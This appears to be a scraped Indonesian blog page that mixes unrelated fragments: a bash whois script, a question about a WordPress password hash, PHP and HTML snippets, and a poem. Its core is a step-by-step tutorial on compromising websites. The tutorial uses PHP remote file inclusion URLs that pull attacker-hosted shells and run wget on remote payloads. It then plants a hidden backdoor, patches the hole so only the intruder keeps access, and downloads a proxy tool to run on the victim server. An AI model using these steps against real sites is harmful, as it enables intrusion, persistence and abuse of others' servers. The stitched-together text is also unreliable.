

#!/bin/bash
# A sample shell script to print domain ip address hosting information such as
# Location of server, city, ip address owner, country and network range.
# This is useful to track spammers or research purpose.
# -------------------------------------------------------------------------
# Copyright (c) 2006 nixCraft project <http://cyberciti.biz/fb/>
# This script is licensed under GNU GPL version 2.0 or above
# -------------------------------------------------------------------------
# This script is part of nixCraft shell script collection (NSSC)
# Visit http://bash.cyberciti.biz/ for more information.
# -------------------------------------------------------------------------
# Last updated on Mar/05/2010
# -------------------------------------------------------------------------
# Get all domains
_dom=$@
# Die if no domains are given
[ $# -eq 0 ] && { echo "Usage: $0 domain1.com domain2.com ..."; exit 1; }
for d in $_dom
do
_ip=$(host $d | grep 'has add' | head -1 | awk '{ print $4}')
[ "$_ip" == "" ] && { echo "Error: $d is not valid domain or dns error."; continue; }
echo "Getting information for domain: $d [ $_ip ]..."
whois "$_ip" | egrep -w 'OrgName:|City:|Country:|OriginAS:|NetRange:'
echo ""
done
./script.sh cyberciti.biz google.comContoh yang keluar:
SumberGetting information for domain: cyberciti.biz [ 74.86.48.99 ]...
OrgName: SoftLayer Technologies Inc.
City: Dallas
Country: US
NetRange: 74.86.0.0 - 74.86.255.255
OriginAS: AS36351
Getting information for domain: google.com [ 209.85.231.104 ]...
OrgName: Google Inc.
City: Mountain View
Country: US
NetRange: 209.85.128.0 - 209.85.255.255
password generated with Wordpress
technology?
how to decrypt?
for example:
admin:$P$9UNhia0YtfZBjpIxbzHZMsuL.SXrU9.
<?
$arr[]="abdy";
$arr[]='andy';
$arr[]='elis';
$arr[]='budiono';
$arr[]='Isa';
unset_arr($arr,"key","9");
function unset_arr($arr, $searchField="value",$value)
{
echo "Array 1:= ";print_r($arr);
if($searchField=="key")
{
if(array_key_exists($value,$arr))
{
echo "Key= $key is unset....!";
}
else
echo "Key=$value is not exist in array<br />";
}
else
{
$found=array_search($value,$arr);
if($found!="") unset($arr[$found]);
else
echo "Given value is not exist in array.....!<br />";
}
echo "<br />";
$arr=array_values($arr);
echo "Array Result==";
print_r($arr);
return $arr;
}
?>
<a href="link.htm" onMouseOver="document.bgColor='#ffffff'">Link Text</a>
<a href="link.htm" onMouseOut="document.bgColor='#00ff00'">Link Text</a>
<a href="link.htm" onClick="document.bgColor='#0000ff'">Link Text</a>
<a href="link.htm" onMouseOver="document.bgColor='#ff0000'"> onMouseOut="document.bgColor='#00ff00'">Link Text</a>
<a href="link.htm" onMouseOver="document.bgColor='#ffff00'" onMouseOut="document.bgColor='#00ff00'" onClick="document.bgColor='#0000ff'">Link Text</a>
<a href="link.htm" onMouseOver="document.bgColor='#ffffff'">Link Text</a>
<a href="http://geoweek.wordpress.com" onMouseOver="document.bgColor='#ffffff'">Geoweek</a>
[php]
// lokasi script: http://localhost/login.php
// script login yang dipanggil dari sebuah form untuk masuk kedalam halaman Admin
// set variable $oke manjadi true jika autentifikasi sukses
if (authentifikasi($_POST['user'],$_POST['password']) {
$oke=true;
}
if ($oke) {
// masuk ke halaman admin
}
[/php]
[php num=5]
// Inisialisasi variable $oke
$oke=false;
if (authentifikasi($_POST['user'],$_POST['password']) {
$oke=true;
}
[/php]
[php num=5]
if (authentifikasi($_POST['user'],$_POST['password']) {
$oke=true;
} else { // jika authentifikasi gagal, set variable $oke menjadi false
$oke=false;
}
[/php]
PHP Shell Injection ( Injeksi PHP ) itu afaan om?
http://www.target.com/[path]/page.php?action=exit.passthru($_GET[cok]);exit&cok=wget http://xXx.co.cc/xXx/r00t
Yang bertulisan tebal itu perintah PHP-nya sedangkan yang bertulisan miring adalah perintah shellnya.
PHP Shell Injection-nya :
http://www.target.com/[path]/page.php?action=exit.include($_GET[cok]);exit&cok= [injekan??]
require_once($bcrm_pub_root . “/public_prepend.inc.php”)
PHP Shell Injection-nya :
http://www.target.com/browser_crm/pub/clients.php?bcrm_pub_root=[injekan??]
http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=[evil code]
Lah mana PHP Shell Injector-nya??? Bagi donk!!!
Hare gene gak punya PHP Shell Injector….? hehehe
http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=[evil code]
http://geocities.com/gara_013/injek.txt???
http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=http://h1.ripway.com/newbe/kambe.txt?
Jangan lupa tanda tanya dibelakangnya harus ditambahkan. Setelah itu paste-kan hasil di atas ke browser lalu jalankan. Kalo browser menampilkan hasil seperti di bawah ini atau mungkin mirip (PHP Injektor memiliki tampilan berbeda-beda), maka selamat buat kamu, kamu telah melakukan yang namanya PHP SHELL INJECTION!
2. PHP SHELL BACKDOORING (Menanam Backdoor PHP)
- Landasan Teori
- Saatnya Beraksi!
find –perm –d /777
mv kambe.txt.txt .system.php
Kalau semua sudah dilakukan tanpa error seperti langkah-langkah di atas, maka selamat, kamu telah melakukan Backdooring!
Horeee… tapi gimana mengakses backdoor tadi om???
Teewwwww….
Oh iya… caranya adalah dengan mengakses alamat file backdoor tadi lewat browser .
Tapi alamat file backdoornya apa om???
Nah, alamat file backdoor tadi dapat diliat dengan cara :
/var/www/intruder/forum/db
http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=http://h1.ripway.com/newbe/kambe.txt?
Sekarang tinggal kamu tes aja mengkases backdoor tersebut dari browser. Kalo hasilnya mengeluarkan tampilan shell seperti atau mirip gambar di bawah ini (masing-masing PHP backdoor berbeda-beda tampilan sama halnya dengan perbedaan PHP Injector), berarti semua berjalan dengan lancar :
PHP Injection sudah. Backdooring sudah (Jangan lupa simpan URL backdoor kamu tadi). Sekarang kamu nggak perlu ngemis-ngemis lagi minta shell dari orang lain kayak tutor yang pertama karena kamu udah bisa memproduksi shell kamu sendiri.
3. PATCHING
- Landasan Teori
2. Keburukan : Kamu egois karena hanya ingin menguasai target sendiri saja. Yang lain jadi pada gak bisa masuk lagi deh lewat tuh celah keamanan. Hehehe…
Mari diambil hikmahnya….. yuuu…
- Saatnya Beraksi!
Patching yang kita lakukan terhadap RFI (Remote File Inclusion) Vulnerability ini akan lebih mudah jika dilakukan dengan PHP Shell Injector sejenis C99 yang mempunyai fitur untuk memanipulasi (editing) source file.
Syarat utama melakukan Patching ini yaitu celah keamanan harus berada pada direktori dengan permission 777 (Kecuali kalau kamu punya akses root, kamu bisa melakukan patching di direktori mana pun)
Ada tiga cara yang mungkin bisa kita lakukan untuk patching sebuah RFI Vulnerability, yaitu :
1. Memodifikasi file yang merupakan bug RFI
http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=http://h1.ripway.com/newbe/kambe99.txt?
Nah, di situ akan terlihat perbedaan warna file yang merupakan bug RFI dari target yaitu warna kuning. Atau bisa dilihat dari url PHP Injection di atas tadi. Bug-nya adalah nama file paling belakang dan sebelum tanda tanya, yaitu file usercp_sendpasswd.php. Sekarang anda tinggal klik tulisan edit di ujung yang sebaris dengan file tersebut pada shell c99 (lihat gambar di atas) yang akan menampilkan isi atau source dari file tersebut, seperti ini :
Setelah itu carilah bagian yang serupa dengan tulisan di atas yang bertuliskan include($phpbb_root_path["user"], karena memang bagian ini lah yang bermasalah (bug RFI-nya) sehingga memungkinkan seorang attacker masuk melaluinya (liat lagi URL PHP Injection tadi). Kemudian lanjutkan dengan mengubah tulisan user di atas dengan nama lain misalnya menjadi seperti ini : include($phpbb_root_path["newbee"]. Setelah itu klik save untuk menyimpannya.
Sekarang coba tes melakukan PHP Injection lagi terhadap target seperti pada awal. Hasilnya mungkin akan seperti ini :
Itu berarti celah keamanan tadi telah berhasil dipatch! Pesan error yang muncul tidak mesti selalu sama seperti di atas, dapat juga berbeda-beda tergantung target dan celah keamanannya, bisa saja memunculkan pesan Fatal Error atau lainnya.
2. Ubah nama file tersebut
chmod 777 usercp_sendpasswd.php
mv usercp_sendpasswd.php newbee.php
3. Hapus file tersebut
Itu berarti celah keamanan tadi telah ditutup, dan ingat! Jika kamu tidak memiliki akses root, maka kamu HANYA bisa melakukan patching seperti di atas apabila dalam kondisi file bug tersebut berada di direktori 777.
Sector Clear! Patching udah. Lalu gimana donk kita masuk lagi ke shell target kalau PHP Injection gak bisa lagi???
Lah, kan tadi kamu uda pasang backdoor. Masuk aja lewat situ… hehehe.. mulai paham kan algoritmanya? Gampang kan?
Tapi ada cara lain lagi untuk memasuki target tanpa menggunakan backdoor, yaitu dengan menggunakan PHP Shell Injection lagi, namun hanya bisa dilakukan jika kamu menggunakan cara pertama atau kedua saja :
http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[newbee]=http://h1.ripway.com/newbe/kambe99.txt?
http://intruder.gmork.cz/forum//includes/newbee.php?phpbb_root_path[user]=http://h1.ripway.com/newbe/kambe99.txt?
Sekarang minum lagi kopi susunya tadi, ntar keburu dingin loh. Nyante aja udah, kamu dah punya backdoor di sebuah website. Lalu ngapain lagi ya? Deface? Kayaknya gak perlu deh, kalau kamu deface tuh website sama aja ibaratnya kamu kirim surat ke rumah orang yang kamu susupi dan mengatakan ”Hey om! Aku dah pasang pintu rahasia di rumah kamu, jadi aku sekarang bebas berkeliaran di rumah kamu sekalipun kamu kunci semua pintu lainnya!!!”. Si admin tuh website yang tahu keberadaan kamu pasti menggunakan berbagai macam cara untuk mendeteksi backdoor yang kamu pasang tadi, ini tentu aja akan menambah peluang dalam memperpendek umur backdoor kamu yang amat sangat berguna itu.
Daripada melakukakan hal-hal seperti di atas, kamu bisa aja memanfaatkan website tersebut untuk hal-hal menarik lainnya, misalnya aja membuat website itu sebagai proxy server pribadi kamu.
4. CREATE PROXY
- Landasan Teori
- Saatnya Bereaksi! Eh.. Beraksi!
wget http://www.mith.com/db/osr/proxy.tgz
tar -zxvf proxy.tgz
cd /var/www/intruder/forum/db/pro atau bisa kamu lakukan secara manual saja.
Isi dari folder pro tersebut adalah file xh dan prox
./xh -s “/usr/sbin/httpd” –d ./prox -a -d –p1234
Kalau tidak ada pesan error, berarti semua berjalan lancar. Kalau kamu memakai proxy tersebut, tinggal masukan IP dan PORT proxy tersebut ke dalam settingan browser misalnya Mozilla seperti gambar di bawah ini :
IP proxy di atas adalah IP dari website target tadi. Bisa kamu cek di http://who.is
Setelah sudah disetting, baru cek lagi di http://who.is apakah berfungsi atau tidak. Dan lihat IP kamu di sana apakah sudah berubah mengikuti IP proxy tersebut.
Selamat… Proxy kamu aktif. Kalau tidak berhasil bisa saja terjadi karena ISP (Penyedia Layanan Internet) kamu tidak mengizinkan adanya akses yang menggunakan proxy melalui server mereka.
—————————— Potong di sini ————————————-
Selesai juga akhirnya… Piuuwwhh….
Tapi lega juga…ho ho ho
/* Tutorial ini hanya sekedar untuk edukasi dan pengetahuan tentang security khususnya cara melakukan penetration test terhadap website sendiri lalu melakukan patching sederhana dan cepat. Segala kerusakan atau kerugian yang terjadi karena penyalahgunaan tutorial ini adalah bukan tanggung jawab saya. */
{
Tentang Waktu
Ambillah waktu untuk berdoa, itu adalah sumber ketenangan.
Ambillah waktu untuk belajar, itu adalah sumber kebijaksanaan.
Ambillah waktu untuk mencintai dan dicintai, itu adalah hak istimewa yang diberikan Tuhan.
Ambillah waktu untuk bersahabat, itu adalah jalan menuju kebahagiaan.
Ambillah waktu untuk memberi, itu adalah membuat hidup terasa bererti.
Jangan sekali-kali kita meremehkan sesuatu perbuatan baik, walaupun hanya sekadar senyuman.